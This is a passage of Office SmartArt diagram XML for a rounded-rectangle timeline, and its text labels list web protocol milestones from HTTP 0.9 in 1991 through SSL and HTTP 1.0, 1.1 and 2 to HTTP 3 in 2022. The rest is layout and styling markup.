    <dgm:cxn modelId="{2343F110-5098-4753-8598-231CF7C8D735}" type="presParOf" srcId="{A7BA8CBE-0103-459E-93C9-576D0C68A1C2}" destId="{2C32AB0A-B872-4B54-AB35-ED916279DD2A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{660D7EFF-D775-4F2B-B918-748B170416FC}" type="presParOf" srcId="{A7BA8CBE-0103-459E-93C9-576D0C68A1C2}" destId="{9573812A-97EF-4588-A3B1-0873349993A8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{A59E6DC3-6773-4FBA-AA2D-37D77CD021EA}" type="presParOf" srcId="{A7BA8CBE-0103-459E-93C9-576D0C68A1C2}" destId="{5B530C14-F662-46A9-80B7-54D829D20F02}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{B4068E1E-E8FF-4213-921E-97F1D785FD28}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{00D70F82-41F7-41FE-B971-500F6A365EE7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{26BED523-028E-4432-BF28-83ABAB9D8CD7}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{026A8E3D-632A-4767-BC2F-584F66166E82}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{699DE575-07D8-4503-8B93-973D1FDDA956}" type="presParOf" srcId="{026A8E3D-632A-4767-BC2F-584F66166E82}" destId="{39593EFD-16AD-409F-A6A3-937D7A8ABA02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{35A08D5C-B5D9-48B5-A14C-CFD4D1881CAF}" type="presParOf" srcId="{026A8E3D-632A-4767-BC2F-584F66166E82}" destId="{E532C61B-EF81-474F-B04E-1AA02E24B7D2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{98BCCF3B-51C1-41D4-A07E-5485F8F99091}" type="presParOf" srcId="{026A8E3D-632A-4767-BC2F-584F66166E82}" destId="{D3BE0A94-0A8A-456A-B10C-8B69CA2B8DFF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{8288DDF7-911B-4F60-A60F-98C7BFF43079}" type="presParOf" srcId="{026A8E3D-632A-4767-BC2F-584F66166E82}" destId="{810D6179-C436-4999-87D9-7ADF18631E52}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{FF592729-39A1-47E6-8CFF-293E4240DA32}" type="presParOf" srcId="{026A8E3D-632A-4767-BC2F-584F66166E82}" destId="{A7F6B8CB-C989-4A8C-A3A9-B674119BB278}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{017EF488-BC3E-415A-8478-D3A68F86F889}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{C4C7CB72-3A22-4C30-9909-A61593F53BFA}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{F8FE7A7F-EA0A-46A6-8A11-827E9F35B157}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{758804FB-931B-4095-AA10-23DD8B7097D0}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{586110A3-E0D0-43B3-92B3-A4A5E84D4558}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{2CBA9A5B-B8F5-40DF-8922-33F06C9A0BE7}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{C260E6D6-FF44-4199-BD8D-9ACC1EA04FB4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{37E3C108-AEDA-4C81-98A7-039BBFD7D04A}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{16BA37F9-AC83-41A1-A225-BBEBE30F8506}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{5F8D449F-EBF2-4A8C-8EE6-0E76D9DEF81F}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{1C86E322-F3BB-40E4-839E-62056634B463}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{90E17D68-C330-4B7B-90B4-D181B0105EF8}" type="presParOf" srcId="{2E7121AA-4EA4-4964-A5F5-AA259BABAB24}" destId="{D55B1135-6DD8-40C9-8028-16DE692531B9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{04AAA966-BCD2-488A-B651-DE1D73B4AA4C}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{B53B3CB0-7947-4C97-9FC3-79535C163E47}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{36F1EF02-A77F-44A9-BFFF-B990B76510FD}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{74AACED8-4F77-4342-8753-E8B191E4254D}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{5AB3FF55-EC45-4135-9783-2A688437DFFE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{24F445CA-0D57-4173-B075-BCEC38CA33DE}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{DA846994-6090-4F97-9118-4EBEE2B30F8C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{57957B3C-796F-4211-A3C7-C59AD91FC1FA}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{80F31A04-C3F1-44A5-A746-95697069E664}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{74F038F8-E16C-4259-B7BD-CCE431F19228}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{DFEA2BC7-A331-4216-89BD-89A50FEA012E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{F0D1E607-0193-4365-B0DC-2BAA04925465}" type="presParOf" srcId="{FC39C52B-0F9D-49AE-8534-848C2A2695F2}" destId="{AB6F2A78-327A-406C-BB74-7F469DEF392E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{4DA2E24B-5EF4-4197-87F9-78E26FE0C5DF}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{050DBE32-6DC4-4105-B402-25076EDCB28A}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{1E4B2310-80F1-4CAF-B02E-463A43984266}" type="presParOf" srcId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" destId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{2AE44BBD-DA0D-47BA-96F3-02E0D27B4F13}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{BA9C5326-2DFE-4E0D-82D0-779AF7799A08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{8B78B94D-A2C5-4016-8511-D978078A5722}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{FD9B2A4B-0A15-4C6D-8F09-2E3A9FAC16C3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{B11EB1E3-18B1-4377-8CBD-A78EA152B23C}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{A1D9E0A4-E264-48F0-BFDD-B9B6FC53C494}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{053F436C-162C-4AC7-8BBD-250A0724FBE6}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{7A2975E1-3363-4AF5-BE51-9FE82BE2B954}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RoundedRectangleTimeline"/>
    <dgm:cxn modelId="{CDE4DA75-6068-4FE1-927B-17671876D1D8}" type="presParOf" srcId="{AD4B9818-3621-492D-8D24-D1C41AABDB88}" destId="{1B52978E-ECBA-48BB-829C-C28D41F6A9FB}"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41FF72-4609-46FE-B1A5-CA4E3FB166C3}"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06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1991</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CC38682-EC9A-44ED-966F-3C8D6019FB56}" type="parTrans" cxnId="{BC4ABFC4-A6AE-4FB2-AA7A-89C91BEB23B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{578DD111-11C3-4CF8-903B-97F01C4D5CD0}" type="sibTrans" cxnId="{BC4ABFC4-A6AE-4FB2-AA7A-89C91BEB23B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A5BAA1A-E72D-4EE5-BB8C-CCE45794FE5B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 0.9</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{354C19D9-75F4-4673-AB87-08B8E19275AA}" type="parTrans" cxnId="{A666FC9B-D6F3-4F59-8E1C-B01493BB6A9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B88D4CF-C92D-4431-AD9E-CC49B0410BF1}" type="sibTrans" cxnId="{A666FC9B-D6F3-4F59-8E1C-B01493BB6A9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4AB946F-C495-4BD6-845C-EC175D2A5A73}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1995</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3880E99C-ED30-4117-8112-E7D3F4C9EF30}" type="parTrans" cxnId="{4CD9143C-6D43-47CA-AAD6-18A5A50E6CDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE1478B4-E2E6-4AFD-BE8B-E015AA8114F7}" type="sibTrans" cxnId="{4CD9143C-6D43-47CA-AAD6-18A5A50E6CDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{828C80CA-58E8-42E8-9FF2-68F6D274AB29}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>SSL</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60931944-1771-4905-BD2A-329721520E1B}" type="parTrans" cxnId="{3B59195D-B938-4A71-806F-5AEA8CE53AFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2246164-5D48-4D63-AE14-642E5108BD87}" type="sibTrans" cxnId="{3B59195D-B938-4A71-806F-5AEA8CE53AFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841C1A9D-094F-4A31-B788-E7BDEE0826FA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1996</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85F87F4E-F96F-48D0-8FCE-04F0CB54A048}" type="parTrans" cxnId="{8AD1B0E3-865C-483B-9662-23CA4185BD92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B57DC10C-8286-4FFA-85BE-EF9BB3A8FB52}" type="sibTrans" cxnId="{8AD1B0E3-865C-483B-9662-23CA4185BD92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2155F7B1-3E41-4FE1-A580-9F40AAB75CDC}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 1.0</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0F4EB21-F07B-4694-BEA5-A1E375CFFF08}" type="parTrans" cxnId="{B4D044D5-64A3-4C32-99F7-41F868391F8C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9E69B40-49AB-4833-98AA-01866A16461A}" type="sibTrans" cxnId="{B4D044D5-64A3-4C32-99F7-41F868391F8C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{428FA987-66A9-4817-A6E5-D2943CAC26A3}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>1997</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49A7E924-133A-4E60-9646-781E17860012}" type="parTrans" cxnId="{E2396FC2-7AEC-4735-A8C7-4622B347E156}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EEC1F55-8D72-46A1-9624-AC377E61D334}" type="sibTrans" cxnId="{E2396FC2-7AEC-4735-A8C7-4622B347E156}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48175535-F0B7-4254-BCF8-5F5B759DA447}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 1.1</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7D773F9-0482-45C5-8626-7CC84F560D52}" type="parTrans" cxnId="{A34A08B0-F70B-4424-BC55-EF165DD004E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C9F7E5C-FDCB-4FBD-892E-01AF3B3199EF}" type="sibTrans" cxnId="{A34A08B0-F70B-4424-BC55-EF165DD004E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D68455E9-A7EC-45AE-B7D1-A65B5476A02A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>2015</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6083ECAC-012C-4BD8-A745-0E45C9EBC0F5}" type="parTrans" cxnId="{DC02823F-98EA-41B9-88F1-B1DA76246847}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DA78237-B950-4E52-B75E-9357010CE37A}" type="sibTrans" cxnId="{DC02823F-98EA-41B9-88F1-B1DA76246847}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B67C7D49-E5F5-4E29-A068-4031D734D0B1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 2</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D77B0BFB-DFE9-4E9D-B36F-08438274C2B1}" type="parTrans" cxnId="{8186E260-3B31-42BA-98E0-E9F8DD1B2B1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0FA011D-5F91-4D82-897A-E70BDF1E9F81}" type="sibTrans" cxnId="{8186E260-3B31-42BA-98E0-E9F8DD1B2B1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65810672-5E43-4BDC-ACCE-608FFFC4CD7F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>2022</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C084864-6270-47D6-9F9F-121F540933A8}" type="parTrans" cxnId="{340BA029-9A5A-4653-B17F-5F0CBC3ED7E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{072C6CC7-4FFE-4097-8F94-8B777B94471D}" type="sibTrans" cxnId="{340BA029-9A5A-4653-B17F-5F0CBC3ED7E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AB148CE-C783-46D7-B68F-52820899CFD4}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 3</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A66552B1-8199-42FE-ACDC-7A3E40A4A565}" type="parTrans" cxnId="{A5F5FAC2-EA2C-431C-9326-DE4A7B29F74E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5A1B835-4D88-460F-B308-D0CA20BFF3A8}" type="sibTrans" cxnId="{A5F5FAC2-EA2C-431C-9326-DE4A7B29F74E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F33DF626-0861-46F6-827D-E09E1FB2E509}" type="pres">
      <dgm:prSet presAssocID="{F741FF72-4609-46FE-B1A5-CA4E3FB166C3}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax/>
          <dgm:chPref/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0FB67AC-7B1F-4E5F-8913-4608DDB0C211}" type="pres">
      <dgm:prSet presAssocID="{06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}" presName="composite1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C6D93FF2-D5FB-40E6-95CF-E5C3D654F3A9}" type="pres">
      <dgm:prSet presAssocID="{06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}" presName="parent1" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47C3AB37-9C52-4749-B530-0C50D80BC6F0}" type="pres">
      <dgm:prSet presAssocID="{06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}" presName="Childtext1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC912698-20C3-46C9-91CC-B8952EE0BD18}" type="pres">
      <dgm:prSet presAssocID="{06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}" presName="ConnectLine1" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr>
        <a:noFill/>
        <a:ln w="10000" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:prstDash val="dash"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{CF681138-387A-4C28-8B52-443560771A07}" type="pres">
      <dgm:prSet presAssocID="{06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}" presName="ConnectLineEnd1" presStyleLbl="lnNode1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED3A50B1-0AA1-4000-8043-C4BCED293516}" type="pres">
      <dgm:prSet presAssocID="{06BF395D-6D3E-4ECC-B435-4FEE9D9F81A0}" presName="EmptyPane1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE8A8274-FA0D-48F9-B65D-11013604659A}" type="pres">
      <dgm:prSet presAssocID="{578DD111-11C3-4CF8-903B-97F01C4D5CD0}" presName="spaceBetweenRectangles1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7BA8CBE-0103-459E-93C9-576D0C68A1C2}" type="pres">
      <dgm:prSet presAssocID="{F4AB946F-C495-4BD6-845C-EC175D2A5A73}" presName="composite1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA1EA8D1-178B-416A-B0DD-97987602BF60}" type="pres">
      <dgm:prSet presAssocID="{F4AB946F-C495-4BD6-845C-EC175D2A5A73}" presName="parent1" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{160C516D-BF93-417D-B6CC-BE4F8A22E8FC}" type="pres">
      <dgm:prSet presAssocID="{F4AB946F-C495-4BD6-845C-EC175D2A5A73}" presName="Childtext1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C32AB0A-B872-4B54-AB35-ED916279DD2A}" type="pres">
      <dgm:prSet presAssocID="{F4AB946F-C495-4BD6-845C-EC175D2A5A73}" presName="ConnectLine1" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr>
        <a:noFill/>
        <a:ln w="10000" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
